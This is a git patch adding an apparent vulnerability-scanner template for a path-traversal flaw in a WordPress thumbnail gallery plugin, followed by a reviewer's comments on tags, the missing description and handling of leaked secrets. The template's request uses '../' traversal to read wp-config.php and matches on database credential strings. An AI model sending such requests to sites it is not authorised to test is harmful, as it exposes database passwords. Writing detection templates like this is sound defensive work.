From c3c2fb4945664c5e204accdbe3da55d69a291c73 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Tue, 26 Oct 2021 08:09:35 +0900
Subject: [PATCH] Create wp-tinymce-thumbnail-plugin-lfi.yaml
---
wp-tinymce-thumbnail-plugin-lfi.yaml | 26 ++++++++++++++++++++++++++
1 file changed, 26 insertions(+)
create mode 100644 wp-tinymce-thumbnail-plugin-lfi.yaml
diff --git a/wp-tinymce-thumbnail-plugin-lfi.yaml b/wp-tinymce-thumbnail-plugin-lfi.yaml
new file mode 100644
index 0000000000..0ae06d6b01
--- /dev/null
+++ b/wp-tinymce-thumbnail-plugin-lfi.yaml
@@ -0,0 +1,26 @@
+id: wp-tinymce-thumbnail-plugin-lfi
+
+info:
+ name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
+ author: 0x_Akoko
+ severity: high
+ tags: wordpress,wp-theme,lfi,wp
+ reference: https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
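Review bot: The `tags` line labels this check `wp-theme`, but the request path sits under `/wp-content/plugins/` and the name describes a plugin, so tag-filtered runs and reports will file it with themes; `tags: wordpress,wp-plugin,lfi,wp` would match what is being tested. The `info` block also carries no `description`; one sentence stating that `download-image.php` apparently serves the file named by `href` without confining it to the plugin directory would tell a triager what a hit means. A match means the response body contained `wp-config.php`, so any stored scan output holds the database credentials and should be handled as a secret, with those credentials rotated once the plugin is patched or removed. Indentation is lost in this rendering, so the nesting of `matchers` under the request could not be checked here.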